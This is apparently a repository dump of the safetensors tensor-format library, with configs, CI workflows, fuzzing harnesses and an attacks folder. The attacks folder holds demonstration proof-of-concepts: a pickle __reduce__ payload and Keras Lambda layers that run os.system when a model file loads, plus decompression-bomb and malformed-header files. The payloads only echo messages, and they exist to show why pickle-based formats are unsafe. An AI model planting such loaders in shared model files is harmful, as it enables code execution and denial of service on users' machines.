├── codecov.yaml
├── codecov.yml
├── safetensors
│   ├── LICENSE
│   ├── README.md
│   ├── fuzz
│   │   ├── .gitignore
│   │   ├── fuzz_targets
│   │   │   └── fuzz_target_1.rs
│   │   └── Cargo.toml
│   ├── src
│   │   └── lib.rs
│   ├── Cargo.toml
│   └── benches
│       └── benchmark.rs
├── bindings
│   └── python
│       ├── tests
│       │   ├── data
│       │   │   └── __init__.py
│       │   ├── test_handle.py
│       │   ├── test_mlx_comparison.py
│       │   ├── test_flax_comparison.py
│       │   ├── test_tf_comparison.py
│       │   ├── test_threadable.py
│       │   ├── test_paddle_comparison.py
│       │   └── test_pt_model.py
│       ├── py_src
│       │   └── safetensors
│       │       ├── py.typed
│       │       ├── __init__.py
│       │       ├── flax.py
│       │       ├── mlx.py
│       │       ├── tensorflow.py
│       │       ├── __init__.pyi
│       │       ├── numpy.py
│       │       └── paddle.py
│       ├── MANIFEST.in
│       ├── Cargo.toml
│       ├── fuzz.py
│       ├── .gitignore
│       ├── README.md
│       ├── setup.cfg
│       ├── Makefile
│       ├── convert_all.py
│       ├── benches
│       │   ├── test_paddle.py
│       │   ├── test_flax.py
│       │   ├── test_mlx.py
│       │   ├── test_tf.py
│       │   └── test_pt.py
│       ├── pyproject.toml
│       ├── src
│       │   └── view.rs
│       └── stub.py
├── .github
│   ├── ISSUE_TEMPLATE
│   │   ├── config.yml
│   │   ├── feature-request.yml
│   │   └── bug-report.yml
│   ├── conda
│   │   ├── bld.bat
│   │   ├── build.sh
│   │   └── meta.yaml
│   ├── workflows
│   │   ├── delete_doc_comment_trigger.yml
│   │   ├── delete_doc_comment.yml
│   │   ├── trufflehog.yml
│   │   ├── stale.yml
│   │   ├── upload_pr_documentation.yml
│   │   ├── build_documentation.yml
│   │   ├── build_pr_documentation.yml
│   │   ├── rust-release.yml
│   │   ├── codecov.yml
│   │   ├── rust.yml
│   │   ├── python-bench.yml
│   │   ├── python-release-conda.yml
│   │   ├── python-release.yml
│   │   └── python.yml
│   ├── stale.yml
│   └── PULL_REQUEST_TEMPLATE.md
├── .dockerignore
├── Makefile
├── attacks
│   ├── tf_safe_ace_get_pwned.py
│   ├── torch_ace_get_pwned.py
│   ├── paddle_ace_get_pwned.py
│   ├── numpy_dos_create.py
│   ├── tf_safe_ace_create.py
│   ├── numpy_dos_get_pwned.py
│   ├── torch_dos_get_pwned.py
│   ├── tf_ace_get_pwned.py
│   ├── tf_ace_create.py
│   ├── torch_ace_create.py
│   ├── safetensors_abuse_attempt_1.py
│   ├── torch_dos_create.py
│   ├── safetensors_abuse_attempt_3.py
│   ├── safetensors_abuse_attempt_2.py
│   ├── paddle_ace_create.py
│   └── README.md
├── .gitignore
├── docs
│   ├── source
│   │   ├── api
│   │   │   ├── flax.mdx
│   │   │   ├── numpy.mdx
│   │   │   ├── paddle.mdx
│   │   │   ├── tensorflow.mdx
│   │   │   └── torch.mdx
│   │   ├── _toctree.yml
│   │   ├── convert-weights.md
│   │   ├── speed.mdx
│   │   ├── index.mdx
│   │   ├── torch_shared_tensors.mdx
│   │   └── metadata_parsing.mdx
│   └── safetensors.schema.json
├── flake.lock
├── flake.nix
├── Dockerfile.s390x.test
├── .pre-commit-config.yaml
├── RELEASE.md
└── README.md
/codecov.yaml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/codecov.yml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/safetensors/LICENSE:
--------------------------------------------------------------------------------
1 | ../LICENSE
--------------------------------------------------------------------------------
/safetensors/README.md:
--------------------------------------------------------------------------------
1 | ../README.md
--------------------------------------------------------------------------------
/bindings/python/tests/data/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/py.typed:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/safetensors/fuzz/.gitignore:
--------------------------------------------------------------------------------
1 | target
2 | corpus
3 | artifacts
4 | coverage
5 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | blank_issues_enabled: true
2 | version: 2.1
3 |
--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------
1 | safetensors/target
2 | bindings/python/target
3 | Dockerfile.s390x.test
4 |
--------------------------------------------------------------------------------
/.github/conda/bld.bat:
--------------------------------------------------------------------------------
1 | cd bindings\python
2 | %PYTHON% -m pip install . --prefix=%PREFIX%
3 |
--------------------------------------------------------------------------------
/.github/conda/build.sh:
--------------------------------------------------------------------------------
1 | cd bindings/python
2 | $PYTHON -m pip install . --prefix=$PREFIX
3 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | doc:
2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd ..
3 |
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 | new_model = tf.keras.models.load_model("tf_ace.keras")
4 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | target/
2 | safetensors/**/Cargo.lock
3 | bindings/python/Cargo.lock
4 | *.bin
5 | *.h5
6 | *.msgpack
7 | *.pt
8 | *.pdparams
9 | *.safetensors
10 | *.npz
11 |
--------------------------------------------------------------------------------
/docs/source/api/flax.mdx:
--------------------------------------------------------------------------------
1 | # Flax API
2 |
3 | [[autodoc]] safetensors.flax.load_file
4 | [[autodoc]] safetensors.flax.load
5 | [[autodoc]] safetensors.flax.save_file
6 | [[autodoc]] safetensors.flax.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/numpy.mdx:
--------------------------------------------------------------------------------
1 | # Numpy API
2 |
3 | [[autodoc]] safetensors.numpy.load_file
4 | [[autodoc]] safetensors.numpy.load
5 | [[autodoc]] safetensors.numpy.save_file
6 | [[autodoc]] safetensors.numpy.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/paddle.mdx:
--------------------------------------------------------------------------------
1 | # PaddlePaddle API
2 |
3 | [[autodoc]] safetensors.paddle.load_file
4 | [[autodoc]] safetensors.paddle.load
5 | [[autodoc]] safetensors.paddle.save_file
6 | [[autodoc]] safetensors.paddle.save
7 |
--------------------------------------------------------------------------------
/attacks/torch_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 | weights = torch.load("torch_ace.pt")
4 | assert list(weights.keys()) == ["weight"]
5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/docs/source/api/tensorflow.mdx:
--------------------------------------------------------------------------------
1 | # Tensorflow API
2 |
3 | [[autodoc]] safetensors.tensorflow.load_file
4 | [[autodoc]] safetensors.tensorflow.load
5 | [[autodoc]] safetensors.tensorflow.save_file
6 | [[autodoc]] safetensors.tensorflow.save
7 |
--------------------------------------------------------------------------------
/safetensors/fuzz/fuzz_targets/fuzz_target_1.rs:
--------------------------------------------------------------------------------
1 | #![no_main]
2 |
3 | use libfuzzer_sys::fuzz_target;
4 | use safetensors::tensor::SafeTensors;
5 |
6 | fuzz_target!(|data: &[u8]| {
7 | let _ = SafeTensors::deserialize(data);
8 | });
9 |
--------------------------------------------------------------------------------
/bindings/python/MANIFEST.in:
--------------------------------------------------------------------------------
1 | include Cargo.toml
2 | include pyproject.toml
3 | include rust-toolchain
4 | include ../../LICENSE
5 | recursive-include src *
6 | recursive-include safetensors-lib *
7 | recursive-exclude safetensors-lib/target *
8 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import paddle
2 |
3 | weights = paddle.load("paddle_ace.pdparams")[0]
4 | assert list(weights.keys()) == ["weight"]
5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.py:
--------------------------------------------------------------------------------
1 | # Re-export this
2 | from ._safetensors_rust import ( # noqa: F401
3 | SafetensorError,
4 | __version__,
5 | deserialize,
6 | safe_open,
7 | _safe_open_handle,
8 | serialize,
9 | serialize_file,
10 | )
11 |
--------------------------------------------------------------------------------
/docs/source/api/torch.mdx:
--------------------------------------------------------------------------------
1 | # Torch API
2 |
3 | [[autodoc]] safetensors.torch.load_file
4 | [[autodoc]] safetensors.torch.load
5 | [[autodoc]] safetensors.torch.save_file
6 | [[autodoc]] safetensors.torch.save
7 | [[autodoc]] safetensors.torch.load_model
8 | [[autodoc]] safetensors.torch.save_model
9 |
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment_trigger.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment trigger
2 |
3 | on:
4 | pull_request:
5 | types: [ closed ]
6 |
7 | jobs:
8 | delete:
9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main
10 | with:
11 | pr_number: ${{ github.event.number }}
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Delete doc comment trigger"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | delete:
11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main
12 | secrets:
13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/attacks/numpy_dos_create.py:
--------------------------------------------------------------------------------
1 | from zipfile import ZIP_DEFLATED, ZipFile
2 |
3 | FILESIZE = 40 * 1000  # 40 GB total (40,000 x 1 MB writes)
4 | BUFFER = b"\0" * 1000 * 1000  # 1 MB
5 |
6 | outfilename = "numpy_dos.npz"
7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
8 | with outzip.open("weights.npy", "w", force_zip64=True) as f:
9 | for i in range(FILESIZE):
10 | f.write(BUFFER)
11 |
--------------------------------------------------------------------------------
/.github/workflows/trufflehog.yml:
--------------------------------------------------------------------------------
1 | on:
2 | push:
3 |
4 | name: Secret Leaks
5 |
6 | jobs:
7 | trufflehog:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - name: Checkout code
11 | uses: actions/checkout@v6
12 | with:
13 | fetch-depth: 0
14 | - name: Secret Scanning
15 | uses: trufflesecurity/trufflehog@main
16 | with:
17 | extra_args: --results=verified,unknown
18 |
19 |
20 |
--------------------------------------------------------------------------------
/.github/workflows/stale.yml:
--------------------------------------------------------------------------------
1 | name: 'Close stale issues and PRs'
2 | on:
3 | schedule:
4 | - cron: '30 1 * * *'
5 |
6 | jobs:
7 | stale:
8 | runs-on: ubuntu-latest
9 | steps:
10 | - uses: actions/stale@v10
11 | with:
12 | stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
13 | days-before-stale: 30
14 | days-before-close: 5
15 |
--------------------------------------------------------------------------------
/.github/workflows/upload_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Upload PR Documentation
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Build PR Documentation"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | build:
11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main
12 | with:
13 | package_name: safetensors
14 | secrets:
15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | model.save("tf_ace.keras", save_format="keras_v3")
18 |
--------------------------------------------------------------------------------
/attacks/numpy_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import numpy as np
4 |
5 | filename = "numpy_dos.npz"
6 |
7 | print(
8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | archive = np.load(filename)
13 | weights = archive["weight"]
14 | assert np.allclose(weights, np.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/bindings/python/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-python"
3 | version = "0.7.0-dev.0"
4 | edition = "2021"
5 | rust-version = "1.74"
6 |
7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
8 | [lib]
9 | name = "safetensors_rust"
10 | crate-type = ["cdylib"]
11 |
12 | [dependencies]
13 | pyo3 = { version = "0.25", features = ["abi3", "abi3-py38"] }
14 | memmap2 = "0.9"
15 | serde_json = "1.0"
16 |
17 | [dependencies.safetensors]
18 | path = "../../safetensors"
19 |
--------------------------------------------------------------------------------
/attacks/torch_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import torch
4 |
5 | filename = "torch_dos.pt"
6 |
7 | print(
8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | weights = torch.load(filename)
13 | assert list(weights.keys()) == ["weight"]
14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/safetensors/fuzz/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-fuzz"
3 | version = "0.0.0"
4 | publish = false
5 | edition = "2021"
6 |
7 | [package.metadata]
8 | cargo-fuzz = true
9 |
10 | [dependencies]
11 | libfuzzer-sys = "0.4"
12 |
13 | [dependencies.safetensors]
14 | path = ".."
15 |
16 | # Prevent this from interfering with workspaces
17 | [workspace]
18 | members = ["."]
19 |
20 | [profile.release]
21 | debug = 1
22 |
23 | [[bin]]
24 | name = "fuzz_target_1"
25 | path = "fuzz_targets/fuzz_target_1.rs"
26 | test = false
27 | doc = false
28 |
--------------------------------------------------------------------------------
/attacks/tf_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import json
3 |
4 | import h5py
5 | import tensorflow as tf
6 |
7 | new_model = tf.keras.models.load_model("tf_ace.h5")
8 |
9 | print("Transformers is not vulnerable to this, as it uses h5 directly.")
10 | print("Keras uses a pickled code of the function within the `h5` attrs of the file")
11 | print("Let's show you the marshalled code")
12 |
13 | with h5py.File("tf_ace.h5") as f:
14 | data = json.loads(f.attrs["model_config"])
15 | print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0]))
16 | pass
17 |
--------------------------------------------------------------------------------
/attacks/tf_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | ###
18 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
19 |
20 | model.save("tf_ace.h5")
21 | ###
22 |
--------------------------------------------------------------------------------
/.github/conda/meta.yaml:
--------------------------------------------------------------------------------
1 | {% set name = "safetensors" %}
2 |
3 | package:
4 | name: "{{ name|lower }}"
5 | version: "{{ SAFETENSORS_VERSION }}"
6 |
7 | source:
8 | path: ../../
9 |
10 | requirements:
11 | host:
12 | - pip
13 | - python x.x
14 | - setuptools
15 | - setuptools-rust
16 | - maturin
17 |
18 | run:
19 | - python x.x
20 |
21 | test:
22 | imports:
23 | - safetensors
24 |
25 | about:
26 | home: https://huggingface.co/docs/safetensors
27 | license: Apache License 2.0
28 | license_file: LICENSE
29 | summary: "Safe and portable way of storing tensors"
30 |
--------------------------------------------------------------------------------
/attacks/torch_ace_create.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 |
4 | class BadDict(dict):
5 | def __init__(self, src: str, **kwargs):
6 | super().__init__(**kwargs)
7 | self.src = src
8 |
9 | def __reduce__(self):
10 | return (
11 | eval,
12 | (f"os.system('{self.src}') or dict()",),
13 | None,
14 | None,
15 | iter(self.items()),
16 | )
17 |
18 |
19 | torch.save(
20 | BadDict(
21 | 'echo "pwned your computer, I can do anything I want."',
22 | **{"weight": torch.zeros((2, 2))},
23 | ),
24 | "torch_ace.pt",
25 | )
26 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_1.py:
--------------------------------------------------------------------------------
1 | import torch
2 | from safetensors.torch import load_file, save_file
3 |
4 | filename = "safetensors_abuse_attempt_1.safetensors"
5 |
6 |
7 | def create_payload():
8 | weights = {"weight": torch.zeros((2, 2))}
9 | save_file(weights, filename)
10 |
11 | with open(filename, "r+b") as f:
12 | f.seek(0)
13 | # Now the header claims 2**32 - xx even though the file is small
14 | n = 1000
15 | n_bytes = n.to_bytes(8, "little")
16 | f.write(n_bytes)
17 |
18 |
19 | create_payload()
20 | # This properly crashes with an out of bounds exception.
21 | test = load_file(filename)
22 |
--------------------------------------------------------------------------------
/flake.lock:
--------------------------------------------------------------------------------
1 | {
2 | "nodes": {
3 | "nixpkgs": {
4 | "locked": {
5 | "lastModified": 1730531603,
6 | "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=",
7 | "owner": "NixOS",
8 | "repo": "nixpkgs",
9 | "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d",
10 | "type": "github"
11 | },
12 | "original": {
13 | "owner": "NixOS",
14 | "ref": "nixos-unstable",
15 | "repo": "nixpkgs",
16 | "type": "github"
17 | }
18 | },
19 | "root": {
20 | "inputs": {
21 | "nixpkgs": "nixpkgs"
22 | }
23 | }
24 | },
25 | "root": "root",
26 | "version": 7
27 | }
28 |
--------------------------------------------------------------------------------
/docs/source/_toctree.yml:
--------------------------------------------------------------------------------
1 | - sections:
2 | - local: index
3 | title: 🤗 Safetensors
4 | - local: speed
5 | title: Speed Comparison
6 | - local: torch_shared_tensors
7 | title: Tensor Sharing in Pytorch
8 | - local: metadata_parsing
9 | title: Metadata Parsing
10 | - local: convert-weights
11 | title: Convert weights to safetensors
12 | title: Getting started
13 | - sections:
14 | - local: api/torch
15 | title: Torch API
16 | - local: api/tensorflow
17 | title: Tensorflow API
18 | - local: api/paddle
19 | title: PaddlePaddle API
20 | - local: api/flax
21 | title: Flax API
22 | - local: api/numpy
23 | title: Numpy API
24 | title: API
25 |
--------------------------------------------------------------------------------
/.github/workflows/build_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build documentation
2 |
3 | on:
4 | push:
5 | branches:
6 | - main
7 | - doc-builder*
8 | - v*-release
9 | - use_templates
10 |
11 | jobs:
12 | build:
13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main
14 | with:
15 | commit_sha: ${{ github.sha }}
16 | package: safetensors
17 | notebook_folder: safetensors_doc
18 | package_path: safetensors/bindings/python/
19 | version_tag_suffix: bindings/python/py_src/
20 | install_rust: true
21 | secrets:
22 | token: ${{ secrets.HUGGINGFACE_PUSH }}
23 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
24 |
--------------------------------------------------------------------------------
/.github/stale.yml:
--------------------------------------------------------------------------------
1 | # Number of days of inactivity before an issue becomes stale
2 | daysUntilStale: 60
3 | # Number of days of inactivity before a stale issue is closed
4 | daysUntilClose: 7
5 | # Issues with these labels will never be considered stale
6 | exemptLabels:
7 | - pinned
8 | - security
9 | # Label to use when marking an issue as stale
10 | staleLabel: wontfix
11 | # Comment to post when marking an issue as stale. Set to `false` to disable
12 | markComment: >
13 | This issue has been automatically marked as stale because it has not had
14 | recent activity. It will be closed if no further activity occurs. Thank you
15 | for your contributions.
16 | # Comment to post when closing a stale issue. Set to `false` to disable
17 | closeComment: false
18 |
--------------------------------------------------------------------------------
/.github/workflows/build_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build PR Documentation
2 |
3 | on:
4 | pull_request:
5 | paths:
6 | - "docs/**"
7 | - "bindings/python/py_src/**"
8 | - ".github/workflows/build_pr_documentation.yml"
9 |
10 | concurrency:
11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }}
12 | cancel-in-progress: true
13 |
14 | jobs:
15 | build:
16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main
17 | with:
18 | commit_sha: ${{ github.event.pull_request.head.sha }}
19 | pr_number: ${{ github.event.number }}
20 | package: safetensors
21 | package_path: safetensors/bindings/python/
22 | version_tag_suffix: bindings/python/py_src/
23 | install_rust: true
24 |
--------------------------------------------------------------------------------
/.github/workflows/rust-release.yml:
--------------------------------------------------------------------------------
1 | name: Rust Release
2 |
3 | env:
4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }}
5 |
6 | on:
7 | push:
8 | tags:
9 | - v*
10 |
11 | jobs:
12 | rust_publish:
13 | runs-on: ubuntu-latest
14 | steps:
15 | - name: Checkout repository
16 | uses: actions/checkout@v6
17 |
18 | - uses: dtolnay/rust-toolchain@stable
19 | - name: Cache Cargo Registry
20 | uses: actions/cache@v5
21 | with:
22 | path: ~/.cargo/registry
23 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }}
24 |
25 | - name: Publish package rust
26 | if: ${{ !contains(github.ref, 'rc') }}
27 | working-directory: ./safetensors
28 | run: cargo publish --token ${CRATES_TOKEN}
29 |
30 |
--------------------------------------------------------------------------------
/attacks/torch_dos_create.py:
--------------------------------------------------------------------------------
1 | import os
2 | from zipfile import ZIP_DEFLATED, ZipFile
3 |
4 | import torch
5 |
6 | FILESIZE = 40 * 1000  # 40 GB total (40,000 x 1 MB writes)
7 | BUFFER = b"\0" * 1000 * 1000  # 1 MB
8 |
9 | filename = "torch_dos_tmp.pt"
10 | torch.save({"weight": torch.zeros((2, 2))}, filename)
11 |
12 |
13 | with ZipFile(filename, "r") as torch_zip:
14 | outfilename = "torch_dos.pt"
15 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
16 | outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read())
17 | outzip.writestr("archive/version", torch_zip.open("archive/version").read())
18 | with outzip.open("archive/data/0", "w", force_zip64=True) as f:
19 | for i in range(FILESIZE):
20 | f.write(BUFFER)
21 |
22 | os.remove(filename)
23 |
--------------------------------------------------------------------------------
/bindings/python/fuzz.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import sys
3 | import tempfile
4 | from collections import defaultdict
5 |
6 | import atheris
7 |
8 |
9 | with atheris.instrument_imports():
10 | from safetensors.torch import load_file
11 |
12 |
13 | EXCEPTIONS = defaultdict(int)
14 | START = datetime.datetime.now()
15 | DT = datetime.timedelta(seconds=30)
16 |
17 |
18 | def TestOneInput(data):
19 | global START
20 | with tempfile.NamedTemporaryFile() as f:
21 | f.write(data)
22 | f.seek(0)
23 | try:
24 | load_file(f.name, device=0)
25 | except Exception as e:
26 | EXCEPTIONS[str(e)] += 1
27 |
28 | if datetime.datetime.now() - START > DT:
29 | for e, n in EXCEPTIONS.items():
30 | print(e, n)
31 | START = datetime.datetime.now()
32 |
33 |
34 | atheris.Setup(sys.argv, TestOneInput)
35 | atheris.Fuzz()
36 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_3.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [200, 200]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)}
15 |
16 | binary = json.dumps(metadata).encode("utf-8")
17 | n = len(binary)
18 | n_header = n.to_bytes(8, "little")
19 |
20 | with open(filename, "wb") as f:
21 | f.write(n_header)
22 | f.write(binary)
23 | f.write(b"\0" * n)
24 |
25 |
26 | create_payload()
27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
28 | start = datetime.datetime.now()
29 | test = load_file(filename)
30 | print(f"Loading the file took {datetime.datetime.now() - start}")
31 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_2.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [2, 2]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {
15 | f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10)
16 | }
17 |
18 | binary = json.dumps(metadata).encode("utf-8")
19 | n = len(binary)
20 | n_header = n.to_bytes(8, "little")
21 |
22 | with open(filename, "wb") as f:
23 | f.write(n_header)
24 | f.write(binary)
25 | f.write(b"\0" * n)
26 |
27 |
28 | create_payload()
29 |
30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
31 | start = datetime.datetime.now()
32 | test = load_file(filename)
33 | print(f"Loading the file took {datetime.datetime.now() - start}")
34 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # What does this PR do?
2 |
3 |
12 |
13 |
14 |
15 | Fixes # (issue) or description of the problem this PR solves.
16 |
--------------------------------------------------------------------------------
/.github/workflows/codecov.yml:
--------------------------------------------------------------------------------
1 | name: Code coverage
2 | on:
3 | push:
4 | branches:
5 | - main
6 |
7 | jobs:
8 | build:
9 | runs-on: ubuntu-latest
10 | defaults:
11 | run:
12 | working-directory: ./safetensors
13 |
14 | steps:
15 | - uses: actions/checkout@v6
16 |
17 | - name: Install Rust Stable
18 | uses: dtolnay/rust-toolchain@stable
19 | with:
20 | components: llvm-tools-preview
21 | override: true
22 |
23 | - uses: Swatinem/rust-cache@v2
24 |
25 | - name: Install cargo-llvm-cov for Ubuntu
26 | run: cargo install cargo-llvm-cov
27 |
28 | - name: Coverage report
29 | run: cargo llvm-cov --release --lcov --output-path lcov.info
30 |
31 | - name: Upload to codecov.io
32 | uses: codecov/codecov-action@v5
33 | with:
34 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
35 | working-directory: ./safetensors
36 | fail_ci_if_error: true
37 |
--------------------------------------------------------------------------------
/bindings/python/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | .pytest_cache/
4 | *.py[cod]
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | .venv/
12 | env/
13 | bin/
14 | build/
15 | develop-eggs/
16 | dist/
17 | eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | include/
24 | man/
25 | venv/
26 | *.egg-info/
27 | .installed.cfg
28 | *.egg
29 |
30 | # Installer logs
31 | pip-log.txt
32 | pip-delete-this-directory.txt
33 | pip-selfcheck.json
34 |
35 | # Unit test / coverage reports
36 | htmlcov/
37 | .tox/
38 | .coverage
39 | .cache
40 | nosetests.xml
41 | coverage.xml
42 |
43 | # Translations
44 | *.mo
45 |
46 | # Mr Developer
47 | .mr.developer.cfg
48 | .project
49 | .pydevproject
50 |
51 | # Rope
52 | .ropeproject
53 |
54 | # Django stuff:
55 | *.log
56 | *.pot
57 |
58 | .DS_Store
59 |
60 | # Sphinx documentation
61 | docs/_build/
62 |
63 | # PyCharm
64 | .idea/
65 |
66 | # VSCode
67 | .vscode/
68 |
69 | # Pyenv
70 | .python-version
71 |
--------------------------------------------------------------------------------
/flake.nix:
--------------------------------------------------------------------------------
1 | {
2 | inputs = {
3 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable";
4 | };
5 |
6 | outputs =
7 | { nixpkgs, ... }:
8 | let
9 | forAllSystems = nixpkgs.lib.genAttrs [
10 | "aarch64-linux"
11 | "x86_64-linux"
12 | "aarch64-darwin"
13 | ];
14 | in
15 | {
16 | devShells = forAllSystems (
17 | system:
18 | let
19 | pkgs = nixpkgs.legacyPackages.${system};
20 | in
21 | {
22 | default = pkgs.mkShell {
23 | buildInputs = with pkgs; [
24 | rustup
25 | python3Packages.python
26 | python3Packages.venvShellHook
27 | ];
28 | venvDir = "./.venv";
29 | postVenvCreation = ''
30 | unset SOURCE_DATE_EPOCH
31 | '';
32 | postShellHook = ''
33 | unset SOURCE_DATE_EPOCH
34 | '';
35 | LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib";
36 | };
37 |
38 | }
39 | );
40 | };
41 | }
42 |
--------------------------------------------------------------------------------
/bindings/python/README.md:
--------------------------------------------------------------------------------
1 | ## Installation
2 |
3 | ```
4 | pip install safetensors
5 | ```
6 |
7 |
8 | ## Usage
9 |
10 | ### Numpy
11 |
12 | ```python
13 | from safetensors.numpy import save_file, load_file
14 | import numpy as np
15 |
16 | tensors = {
17 | "a": np.zeros((2, 2)),
18 | "b": np.zeros((2, 3), dtype=np.uint8)
19 | }
20 |
21 | save_file(tensors, "./model.safetensors")
22 |
